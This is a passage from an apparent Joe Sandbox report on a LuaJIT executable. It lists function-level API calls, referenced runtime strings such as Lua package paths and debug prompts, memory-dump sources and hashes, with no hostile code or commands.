                                                                                                                                                                        • Instruction Fuzzy Hash: 14114832609A8292E760EB54F44475AF7A0FBC5380F908536EA8D43B68DF7ED0589B64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09D6B
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09D8A
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: GetProcAddress.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B094D0
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09DA9
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B0941B
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: GetLastError.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B09429
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B0946B
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09DC8
                                                                                                                                                                          • Part of subcall function 00007FF738B09378: FreeLibrary.KERNEL32(?,?,00000002,00007FF738B09856,?,?,?,00007FF738B0AB66,?,?,?,00007FF738AFAF01), ref: 00007FF738B094A4
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09DE7
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E06
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E25
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E44
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E63
                                                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00007FF738B09E82
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                        • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                        • API String ID: 3255926029-3252031757
                                                                                                                                                                        • Opcode ID: f4f064dfd8f8160fec77be139e6c26641e1cf4b0400fa2d82c480ab4ae69d6c5
                                                                                                                                                                        • Instruction ID: ccaf10a8387b0b2c3c42579d3e15ea176ff79a9c6e7d5fddadc72b6a5a9a9571
                                                                                                                                                                        • Opcode Fuzzy Hash: f4f064dfd8f8160fec77be139e6c26641e1cf4b0400fa2d82c480ab4ae69d6c5
                                                                                                                                                                        • Instruction Fuzzy Hash: D23186A2948A8FB0F604FBA0E8615F5E321AF04355FC04533D01D521B58F7FA64AE7AB
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcsxfrm$_free_nolock
                                                                                                                                                                        • String ID: .\?.dll;!\?.dll;!\loadall.dll$.\?.lua;!\lua\?.lua;!\lua\?\init.lua;$LUA_CPATH$LUA_NOENV$LUA_PATH$\;?!-$_LOADED$_LOADLIB$_PRELOAD$__gc$config$cpath$loaded$loaders$package$path$preload
                                                                                                                                                                        • API String ID: 338564694-1474762456
                                                                                                                                                                        • Opcode ID: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                                                                                                                                        • Instruction ID: ca08aa9e04e3b91c9b828b872c4fe5d71470b382ffaa0eb2e2377458a620f71f
                                                                                                                                                                        • Opcode Fuzzy Hash: 567adbf67685013490825193ac147204f22a5be4c67c6fdfc6ce4f3ce722572e
                                                                                                                                                                        • Instruction Fuzzy Hash: CE518823A29986A2E610FB65E8416AAE360FBC4750FC00132F55D477AACFBED501E758
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcsxfrm
                                                                                                                                                                        • String ID: %s:$...$[builtin#%d]:$ at %p$ in function '%s'$ in function <%s:%d>$ in main chunk$%d:$%s$Snlf$stack traceback:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolockwcsftime
                                                                                                                                                                        • String ID: day$hour$isdst$min$month$sec$wday$yday$year
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                                                                                                                                        • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: -$f$p$p
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF481
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF48F
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF4B9
                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF4FF
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF738ADF6AE,?,?,?,00007FF738ADF3A0,?,?,00000001,00007FF738ADF135), ref: 00007FF738ADF50B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                        • String ID: CONOUT$
                                                                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                                                                        • Opcode ID: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                                                                                                                                        • Instruction ID: af8bde53efd4eff783f4040136d7d8eb058943c8518dd5b4a431a02d4bd993d4
                                                                                                                                                                        • Opcode Fuzzy Hash: b0ca9c991d90a88812005bb169e0b0acbdb3826b13817d58da2bb6e22e5a5c46
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E119622718A8796E7509B52F844329E2A0FB88FE4F844234ED5D877A8CF3DD5049759
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: =[C]$Lua$main
                                                                                                                                                                        • API String ID: 0-2004024069
                                                                                                                                                                        • Opcode ID: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                                                                                                                                        • Instruction ID: ff1dec56d8d0c4e1335bd20ccc48312bfa4c2852e832ea3afb67f910105a2988
                                                                                                                                                                        • Opcode Fuzzy Hash: 98888c1c1b4fbd91893acc06f877c56911a3da836486efa45674046b72bb33cb
                                                                                                                                                                        • Instruction Fuzzy Hash: 72221733609B9585EB70DB19E0807AEFBA0F788B90F544126DA9D83BA8DF3DD440DB14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID: C$I$J$N
                                                                                                                                                                        • API String ID: 3168844106-327184588
                                                                                                                                                                        • Opcode ID: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                                                                                                                                        • Instruction ID: 1a5b7d5844336dafd69dbde823a39f49e0d97ead2d92157a5abfccd6d5220f1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 83ce02c18b74ab7690867f7129cd025f4307d28ad18693c6399902bf2de4f0be
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E313AB351D7818ADB60DB15E04062AFBA0F788B68F001226FBDE43B98CB7DD5419F18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID: "$cosh
                                                                                                                                                                        • API String ID: 1156100317-3800341493
                                                                                                                                                                        • Opcode ID: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                                                                                                                                        • Instruction ID: b00d82d540100a87e1d91a3d4a046ff06dbf2119aad8c3dd774e7ffc86bf1063
                                                                                                                                                                        • Opcode Fuzzy Hash: 4ff544f207e6571879e34d33e517a1524432bb637838e2e3dc8f8d8d0094ffd6
                                                                                                                                                                        • Instruction Fuzzy Hash: 45810632E28FC699D263AB30A4017B6F318BF5A3C5F509333D59E31A51DF3EA0829615
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                        • API String ID: 851805269-3733052814
                                                                                                                                                                        • Opcode ID: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                                                                                                                                        • Instruction ID: ce37741aa866586a25a82c7c4507c66efad4696a92981f3c3fb4181b38ca2caa
                                                                                                                                                                        • Opcode Fuzzy Hash: 66764fde3e1a62519f2eee85ab969929366ba9d51dab0d73a188cd519674cb36
                                                                                                                                                                        • Instruction Fuzzy Hash: 1561B2339097829AEB20AF21D450769F7A0FB54B98F884536DA8C47795CF3DF490EB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: type_info::_name_internal_method
                                                                                                                                                                        • String ID: builtin#$false$nil$true
                                                                                                                                                                        • API String ID: 3713626258-3570738779
                                                                                                                                                                        • Opcode ID: b3ed43a0707a28e9115af90190efc957a42a7c81376a56ada5ae18f244965fa4
                                                                                                                                                                        • Instruction ID: f07cfca2f8301972de7290bf8b2c47ccf29055a7c8a9656e9e3ab4d7db7f48fc
                                                                                                                                                                        • Opcode Fuzzy Hash: b3ed43a0707a28e9115af90190efc957a42a7c81376a56ada5ae18f244965fa4
                                                                                                                                                                        • Instruction Fuzzy Hash: F661562361DA4595EA209B29E48052DF7A0F788BE4F904332EB9D877F8CF7DD1409B14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$_mbsncpy_s
                                                                                                                                                                        • String ID: (error object is not a string)$=(debug command)$cont$lua_debug>
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_nolock_mbsncpy_s
                                                                                                                                                                        • String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: $*
                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: $*
                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: $*
                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID: $*
                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                        • String ID: "$sinh
                                                                                                                                                                        • API String ID: 1156100317-1232919748
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unwind__except_validate_context_record
                                                                                                                                                                        • String ID: csm$f
                                                                                                                                                                        • API String ID: 2208346422-629598281
                                                                                                                                                                        • Opcode ID: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
